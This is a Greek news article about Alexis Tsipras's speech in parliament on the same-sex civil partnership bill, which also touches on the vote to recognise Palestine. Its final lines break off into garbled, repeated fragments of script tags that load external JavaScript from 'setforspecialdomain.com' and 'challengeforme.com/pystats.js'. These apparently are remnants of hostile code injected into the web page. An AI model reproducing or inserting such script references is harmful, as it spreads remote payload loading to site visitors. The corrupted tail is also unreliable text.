Τσίπρας για Σύμφωνο Συμβίωσης: Κλείνει ένας κύκλος ντροπής και οπισθοδρόμησης

Παρέμβαση στη συζήτηση επί του νομοσχεδίου για το Σύμφωνο Συμβίωσης ομόφυλων ζευγαριών πραγματοποίησε ο πρωθυπουργός Αλέξης Τσίπρας επισημαίνοντας πως με την ψήφιση του νομοσχεδίου «κλείνει ένας κύκλος οπισθοδρόμησης και ντροπής για το ελληνικό κράτος», «ένας κύκλος αρνήσεως και περιθωριοποίησης χιλιάδων συμπολιτών μας» και ανοίγει ένας κύκλος ισονομίας και αξιοπρέπειας».

Ο πρωθυπουργός, με τα θεωρία της Βουλής να είναι κατάμεστα από πολίτες, έκανε λόγο για μια «σημαντική ημέρα για τα ανθρώπινα δικαιώματα, καθώς αναγνωρίζεται η δυνατότητα όλων των ανθρώπων, ανεξαρτήτως φύλου και σεξουαλικού προσανατολισμού, να συμβιώσουν». Αναφέρθηκε εκτενώς στην ανάγκη «υπεράσπισης της ισοτιμίας απέναντι στο νόμο για όλους τους συμπολίτες μας». «Αναγνωρίζουμε την ισοτιμία σε όλους ανεξαρτήτως φύλου και σεξουαλικού προσανατολισμού, να έχουν ίσα δικαιώματα απέναντι στη ζωή και το θάνατο», είπε.

Ο Αλέξης Τσίπρας ζήτησε επίσης υγγνώμη από χιλιάδες πολίτες της χώρας μας γιατί στερήθηκαν εδώ και καιρό δικαιωμάτων. Ο συγκεκριμένος νόμος ήρθε με καθυστέρηση πολλών ετών στη χώρα μας και με καθυστέρηση πολλών μηνών σε ό,τι αφορά την κυβέρνηση του ΣΥΡΙΖΑ, για τον οποίο το σύμφωνο συμβίωσης αποτελούσε προεκλογική δέσμευση, δήλωσε και χαρακτήρισε την ψήφισή του νομοσχεδίου «ιστορική δημοκρατική παρακαταθήκη».

Η έννοια της «ισοελευθερίας»

Αναφερόμενος στην έννοια της «ισοελευθερίας», ο πρωθυπουργός σημείωσε πως «είναι ένας ορίζοντας και απομακρύνεται κάθε φορά που κάνουμε ένα βήμα προς αυτή, όπως ο ορίζοντας. Όμως κάθε βήμα αφήνει αποτυπώματα. Αυτή η μικρή αλλαγή παράγει αποτελέσματα που βελτιώνει τις ζωές χιλιάδων συμπολιτών μας και αυτό είναι κάτι. Η νομική αναγνώριση θα λύσει πολλά προβλήματα της καθημερινότητας των ομοφύλων. Το ίδιο κάνουμε και για τα ετερόφυλα ζευγάρια».

«Το κεντρικό σήμερα παραμένει η κοινωνική τομή που κάνουμε. Ανοίγουμε δρόμους και πιστεύω ότι αυτοί θα δώσουν την δυνατότητα για νέους αγώνες που θα δικαιωθούν στο μέλλον», δήλωσε ο Αλέξης Τσίπρας και απηύθυνε κάλεσε σε όλες τις δημοκρατικές δυνάμεις και τα κινήματα για «καθημερινό αγώνα» ενάντια στις διακρίσεις και τον ρατσισμό.

«Έχουμε πολύ δρόμο να διανύσουμε, να συνεχίσουμε τον καθημερινό αγώνα ενάντια σε κάθε μορφής διάκριση, ιδιαίτερα ενάντια στον ρατσισμό», είπε και πρόσθεσε: «Αυτός ο αγώνας χρειάζεται συστράτευση των δημοκρατικών δυνάμεων και των κοινωνικών κινημάτων, διαρκή εγρήγορση και πολιτικό θάρρος για να μην αφήσουμε το σκοτάδι να κερδίσει».

Ο Αλέξης Τσίπρας σημείωσε πως «το ευχάριστο είναι ότι η ελληνική κοινωνία απέδειξε ότι ταυτίζεται με τις κανονιστικές αρχές του κράτους δικαίου και της ισότητας». Η ελληνική κοινωνία «απέδειξε ότι δεν είναι τόσο φοβική και μίζερη όσο κάποιοι ήθελαν να την παρουσιάζουν», δήλωσε, κάνοντας λόγο για «ιστορική δημοκρατική παρακαταθήκη, μία νίκη των δικαιωμάτων σε έναν διαρκή και χωρίς τέλος αγώνα με ορίζοντα την ισοελευθερία».

Ιστορική μέρα για τη χώρα, τη Δημοκρατία, το κοινοβούλιο

Ο πρωθυπουργός αναφέρθηκε και στην πρωινή απόφαση της Βουλής για αναγνώριση της Παλαιστίνης.  «Είναι σημαντική ιστορική μέρα για τη χώρα, τη Δημοκρατία, το κοινοβούλιο», υπογράμμισε και πρόσθεσε ότι «το ψήφισμα της Βουλής για την Παλαιστίνη αποτελεί ιστορικό βήμα ,και με ιδιαίτερο συμβολισμό για την περιοχή, αναγνώρισης του μακρόχρονου αγώνα του παλαιστινιακού λαού. Αποτελεί ελάχιστη ένδειξη συμπαράστασης και της φιλίας των δύο λαών. Αποτελεί ταυτόχρονα αγωνιώδες κάλεσμα στους διεθνώς εμπλεκόμενους να ακολουθήσουν τον δρόμο της συνεννόησης και της ειρήνης και για να παίξει η χώρα μας το ρόλο του διαμεσολαβητή. Η βία, ο αποκλεισμός του ελληνικού λαού. Η κυβέρνηση έχει διακηρύξει σε όλους τους τόνους την ανάγκη για αναγνώριση του παλαιστινιακού κράτους στα όρια του 1967 με πρωτεύουσα την Ανατολική Ιερουσαλήμ», δήλωσε.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >